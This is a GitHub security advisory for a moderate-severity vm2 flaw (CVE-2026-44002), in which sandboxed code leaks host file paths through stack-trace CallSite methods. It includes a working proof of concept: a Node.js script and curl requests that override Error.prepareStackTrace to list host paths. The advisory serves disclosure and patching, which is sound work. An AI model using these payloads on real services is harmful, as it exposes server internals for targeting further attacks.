Skip to content

vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak

Moderate severity GitHub Reviewed Published May 1, 2026 in patriksimek/vm2 • Updated May 14, 2026

Package

npm vm2 (npm)

Affected versions

<= 3.10.5

Patched versions

3.11.0

Description

Summary

vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.

Details

In lib/setup-sandbox.js:436-466, the CallSite class overrides getThis() and getFunction() with undefined to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:

  • getFileName() — returns host absolute paths like /app/node_modules/vm2/lib/vm.js
  • getLineNumber(), getColumnNumber() — exact source locations
  • getFunctionName(), getMethodName(), getTypeName() — internal function names

Two exploitation paths exist:

  1. Default error.stack: new Error().stack includes host frame paths in the formatted string
  2. Custom prepareStackTrace: Attacker can set Error.prepareStackTrace to directly call getFileName() on each CallSite, extracting a clean list of all host paths

PoC

Library-level PoC (Node.js script — primary):

const { VM } = require("vm2");
const vm = new VM();

// Path A — Default error.stack
const result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);
console.log(result1);
// Output includes: /app/node_modules/vm2/lib/vm.js:289:18
//                   /app/src/server.js:49:20

// Path B — prepareStackTrace extraction
const result2 = vm.run(`
  Error.prepareStackTrace = function(e, sst) {
    return sst.map(function(s) { return s.getFileName(); }).join(", ");
  };
  new Error().stack
`);
console.log(result2);
// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...

HTTP demonstration:

# Default error.stack
curl -s -X POST http://localhost:3000/api/execute \
  -H "Content-Type: application/json" \
  -d '{"code":"try { null.x; } catch(e) { e.stack }"}'
# Result includes host paths: /app/src/server.js, /app/node_modules/express/...

# prepareStackTrace extraction
curl -s -X POST http://localhost:3000/api/execute \
  -H "Content-Type: application/json" \
  -d '{"code":"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\", \"); }; new Error().stack"}'
# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...

Impact

  • Information Disclosure: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.
  • Attack Chain: Leaked paths enable precise targeting for other vulnerabilities.
  • Scope: All applications using vm2. No special configuration required.

References

@patriksimek patriksimek published to patriksimek/vm2 May 1, 2026
Published to the GitHub Advisory Database May 7, 2026
Reviewed May 7, 2026
Published by the National Vulnerability Database May 13, 2026
Last updated May 14, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(15th percentile)

Weaknesses

Generation of Error Message Containing Sensitive Information

The product generates an error message that includes sensitive information about its environment, users, or associated data. Learn more on MITRE.

CVE ID

CVE-2026-44002

GHSA ID

GHSA-v27g-jcqj-v8rw

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.